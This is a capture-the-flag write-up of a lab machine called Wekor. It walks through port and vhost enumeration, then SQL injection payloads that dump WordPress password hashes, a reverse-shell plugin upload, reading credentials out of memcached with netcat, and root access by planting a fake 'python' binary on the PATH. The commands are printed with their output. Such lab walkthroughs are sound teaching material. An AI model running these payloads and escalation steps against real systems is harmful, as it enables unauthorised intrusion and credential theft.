This room was a very interesting one which involved a couple of techniques I hadn't used before. It also required using some tools I've used a lot before but for different purposes. That being said, I started in the usual way by scanning for open ports.
# Nmap 7.91 scan initiated Sat May 29 00:36:16 2021 as: nmap -F -oN wekor.nmap 10.10.30.12 Nmap scan report for 10.10.30.12 Host is up (0.039s latency). Not shown: 98 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http
Usually when only port 80 and 22 are open it means that the way in to the server will be via a web-based attack through the web site. I added
wekor.thm to my
/etc/hosts file and went to the URL.
This just displayed a simple white site with the text "Welcome internet user". I decided to scan for hidden directories/files.
/.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /index.html (Status: 200) /robots.txt (Status: 200) /server-status (Status: 403)
A quick look at the
robots.txt file revealed quite a lot of interesting directories to try.
User-agent: * Disallow: /workshop/ Disallow: /root/ Disallow: /lol/ Disallow: /agent/ Disallow: /feed Disallow: /crawler Disallow: /boot Disallow: /comingreallysoon Disallow: /interesting
All of these didn't lead anywhere, except
Welcome Dear Client! We've setup our latest website on /it-next, Please go check it out! If you have any comments or suggestions, please tweet them to @faketwitteraccount! Thanks a lot !
So I visited the
/it-next directory and was greeted with the following website.
I searched around the website for some vulnerabilities and eventually came across a field that was susceptible to SQL Injection. This was the coupon field on the Shopping Cart page.
I started off by trying to determine how many values a legitimate query in this box is supposed to return. This can be achieved by escaping the original query parameter and adding an order by clause with sequential numbers. Whichever number it fails on, we know that the query is expecting 1 result less than this. I entered the coupon code
' order by 1,2,3,4,5,6,7,8,9 -- - and
Unknown column '4' in 'order clause' was returned. I now know we are expecting 3 values in response.
From here I can run queries like the following to determine any schemas (databases) that are present.
' union select 1,group_concat(schema_name),3 from information_schema.schemata -- -
This works by joining results from the left, which thanks to me escaping the intended coupon code value, will be null, and the result of the query on the right, which in this case is returning 3 values, 1, the names of the databases on the server (comma separated thanks to group_concat) and 3.
Coupon Code : 1 With ID : information_schema,coupons,mysql,performance_schema,sys,wordpress And With Expire Date Of : 3 Is Valid!
Interesting, so there appears to be a wordpress database on the server and most likely a WordPress website running somewhere as well. I crafted a query to extract the usernames and password hashes for the users in the WordPress database and then used hashcat to crack the passwords offline.
' union select 1, group_concat(user_login, ':', user_pass),3 from wordpress.wp_users -- -
admin:$P$BoyfR2QzhNjRNmQZpva6TuuD0EE31B. wp_jeffrey:$P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10 wp_yura:$P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/ wp_eagle:$P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/
I now had a valid username and password for a WordPress site somewhere, but did not know where to find it, so it was time to scan for subdomains.
Up until now I had only ever used
gobuster to scan for directories, by using the
gobuster dir command but I learned that it can also be used to search for
vhost which can include sub-domains. I ran
gobuster and got the following results.
──(gareth㉿enso)-[~/Desktop/Files/Wekor] └─$ gobuster vhost -u http://wekor.thm -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://wekor.thm [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2021/05/31 21:52:03 Starting gobuster =============================================================== Found: site.wekor.thm (Status: 200) [Size: 143]
I added this subdomain to my
/etc/hosts file and visited the URL in my browser.
To my disappointment it did not reveal a wordpress site but instead simply said
Hi there! Nothing here for now, but there should be an amazing website here in about 2 weeks, SO DON'T FORGET TO COME BACK IN 2 WEEKS! - Jim
I decided to do a normal directory scan on the
site.wekor.thm subdomain to see if anything interesting stood out there.
┌──(gareth㉿enso)-[~/Desktop/Files/Wekor] └─$ gobuster dir -u http://site.wekor.thm -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://site.wekor.thm [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2021/05/31 21:55:13 Starting gobuster =============================================================== /.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /index.html (Status: 200) /server-status (Status: 403) /wordpress (Status: 301) =============================================================== 2021/05/31 21:55:32 Finished ===============================================================
I finally found the location of the WordPress blog site.
I was able to login as a user on the WordPress blog by using the previously cracked password I found through the SQL injection exploit.
The user I logged in with was the
wp_yura user. This user was allowed to add plugins, so I added a WordPress reverse shell plugin and was able to connect to my machine.
www-data@osboxes:/var/www/html/site.wekor.thm/wordpress/wp-admin$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data)
Horizontal Privilege Escalation
Now that I had a shell on the server I could start to try and escalate my privileges. The tag-line for the room said something about recognizing internal services, so I decided to check what ports were open locally.
A quick google for default port 11211 revealed that it was most likely
memcached that was running on the server. According to the website
memcached is a Free and open source, high-performance, distributed memory object caching system.
I did some googling around how to interrogate
memcached and found that I could use my good friend
netcat to send commands to it.
Thanks to hacktrickz I was able to figure out how to query this memory object caching system and find something useful.
www-data@osboxes:/home$ echo "stats cachedump 1 0" | nc -vn -w 1 127.0.0.1 11211 Connection to 127.0.0.1 11211 port [tcp/*] succeeded! ITEM id [4 b; 1622488289 s] ITEM email [14 b; 1622488289 s] ITEM salary [8 b; 1622488289 s] ITEM password [15 b; 1622488289 s] ITEM username [4 b; 1622488289 s] END
I obviously want to see the username and password values. So I check on hacktrickz for how to do this and then execute the following commands:
www-data@osboxes:/home$ echo "get username" | nc -vn -w 1 127.0.0.1 1121 Connection to 127.0.0.1 11211 port [tcp/*] succeeded! VALUE username 0 4 Orka END www-data@osboxes:/home$ echo "get password" | nc -vn -w 1 127.0.0.1 11211 Connection to 127.0.0.1 11211 port [tcp/*] succeeded! VALUE password 0 15 <redacted> END
With the username and password I was able to switch to the
Orka user and capture the
www-data@osboxes:/home$ su Orka Password: Orka@osboxes:/home$ cd Orka Orka@osboxes:~$ cat user.txt <redacted>
Vertical Privilege Escalation
I started enumerating the server to try and find a way to escalate my privileges to the root user. I did my usual checks of what my user is allowed to run as sudo, what, if any, cron jobs are running and if there are any binaries with the SUID bit set.
I found that the
Orka user could run the
bitcoin binary as the root user.
Orka@osboxes:~/Desktop$ sudo -l [sudo] password for Orka: Matching Defaults entries for Orka on osboxes: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User Orka may run the following commands on osboxes: (root) /home/Orka/Desktop/bitcoin
strings on the
bitcoin binary and found that it made a call to
Unfortunately I didn't have write permissions on the
transfer.py file, but I did notice something about the call to execute it. The
bitcoin binary was not using an absolute path for the python executable. This should mean I can make my own python binary and have
bitcoin execute it instead (provided it is found on the PATH before the actual python binary).
/usr/sbin directory was writeable by the
Orka user so I was able to make my own "
python" file which opens a bash shell, giving me access as the root user.
Orka@osboxes:~/Desktop$ cd /usr/sbin Orka@osboxes:/usr/sbin$ touch python Orka@osboxes:/usr/sbin$ nano python Orka@osboxes:/usr/sbin$ cat python #!/bin/bash /bin/bash Orka@osboxes:/usr/sbin$ chmod +x python
Orka@osboxes:~/Desktop$ sudo ./bitcoin Enter the password : password Access Granted... User Manual: Maximum Amount Of BitCoins Possible To Transfer at a time : 9 Amounts with more than one number will be stripped off! And Lastly, be careful, everything is logged :) Amount Of BitCoins : 9 root@osboxes:~/Desktop# id uid=0(root) gid=0(root) groups=0(root) root@osboxes:~/Desktop# cat /root/root.txt <redacted>
I liked this room because it involved a few different techniques and felt quite realistic. I learned how to interrogate
memcached and how to use
gobuster to search for different vhosts rather than just directories.